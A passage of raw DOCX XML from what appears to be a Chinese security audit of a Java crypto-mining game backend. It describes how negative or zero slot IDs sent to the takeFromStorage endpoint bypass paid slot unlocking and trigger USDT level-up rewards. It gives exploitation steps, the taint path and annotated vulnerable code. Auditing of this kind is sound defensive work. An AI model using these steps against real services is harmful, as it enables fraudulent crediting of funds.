        <w:t xml:space="preserve"> 依次取 -1、-2、-3……；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每个负数坑位各放置一台矿机，绕过坑位解锁付费机制；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">系统 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无坑位过滤，所有矿机（含负坑位）算入总算力；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="471"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若所放矿机等级高于当前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，额外触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，增发 USDT 余额；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="472"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：用户算力显著高于正常上限，可能触发多级 USDT 升级奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="473"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是（需要有效 Bearer Token + 请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="474"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户即可利用，无需管理员权限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475"/>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MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel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audit_m152_513_takeFromStorage_ctrl-path3of6.md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：MinerService.java#isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_23" w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞22：坑位ID下界缺失校验导致矿机激活数量无限绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="47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isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 缺少坑位ID下界校验，允许使用负数/零坑位ID绕过坑位解锁门控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="47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src/main/java/com/gameBack/mjservice/service/MinerService.java:isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="47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：业务逻辑绕过 / 资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="47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48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numPr>
          <w:numId w:val="481"/>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isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if (slotId &lt;= 6) return true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 作为"默认免费坑位"判断逻辑，仅设置了上界（≤6）而未设置下界（≥1）。攻击者可传入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId=0</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 xml:space="preserve"> 等任意负整数或零，这些值均满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 而被视为"已解锁"，直接跳过坑位解锁检查。坑位占用校验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对这些异常坑位同样生效（空坑位即通过），矿机因此被以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入数据库并成为"激活状态"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 无差别拉取全部激活矿机（不区分坑位ID），负数坑位中的矿机完整参与算力计算；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 亦将这些矿机纳入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>maxLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 计算，触发升级 USDT 奖励发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者可利用此漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>完全绕过坑位解锁付费机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：正常游戏中坑位7及以上需付费解锁，但通过坑位0/-1/-2...可无限扩充激活矿机数量，使付费解锁机制形同虚设；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="483"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>激活超出系统限制的矿机数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：默认仅有6个坑位，攻击者可将任意数量矿机全部激活，算力（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）大幅超出设计上限，持续获取超额算力奖励；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="484"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>利用更多激活矿机触发升级 USDT 奖励</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：将原本只能存放在仓库中的高级矿机（因坑位已满无法正常激活）通过负数坑位激活，触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 向账户直接增加 USDT 余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="485"/>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POST /api/miner/takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（userId 来自 Token，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来自请求体，攻击者完全可控） → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerService.takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行坑位校验，漏洞点） → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 统计全部 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 矿机算力，包括负数坑位矿机） → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>maxLevel &gt; oldLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，直接向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount.usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加值并 save）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="486"/>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487"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接：高级矿机通过负数坑位激活后触发等级提升，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>account.usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直接累加 USDT，等价于免费获取本应通过付费解锁坑位才能获得的升级奖励；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="488"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>持续：算力(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)被长期高估，凡依赖该字段计算的所有持续性收益均被放大，危害覆盖账户全生命周期。</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TakeFromStorageForm 字段（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long minerId;         ← 指定要取出的矿机</w:t>
              <w:br/>
              <w:t>//   Integer targetSlotId; ← 攻击者传入 0 / -1 / -2 等负整数，触发漏洞</w:t>
              <w:br/>
              <w:t>@PostMapping("/takeFromStorage")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; takeFromStorage(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @CurrentUserId Long userId,            // ← 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody TakeFromStorageForm form) { // ← targetSlotId 攻击者完全可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.takeFromStorage(userId, form.getMinerId(), form.getTargetSlotId())); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 业务层：MinerService.java#takeFromStorage</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner takeFromStorage(Long userId, Long minerId, Integer targetSlotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, targetSlotId)) { // ← 调用缺陷校验方法，targetSlotId=-1 时仍返回 true</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0).isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位已被占用"); // ← 负数坑位首次使用时无矿机，通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(targetSlotId); // ← 矿机以 slotId=-1 写入 DB，状态变为激活</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId); // ← 触发算力/等级重算及 USDT 发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：MinerService.java#isSlotUnlocked</w:t>
              <w:br/>
              <w:t>public boolean isSlotUnlocked(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (slotId &lt;= 6) return true; // ← 漏洞点：0、-1、-2 ... 均满足此条件，直接返回 true，完全绕过解锁校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userSlotUnlockRepository.findByUserIdAndSlotId(userId, slotId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
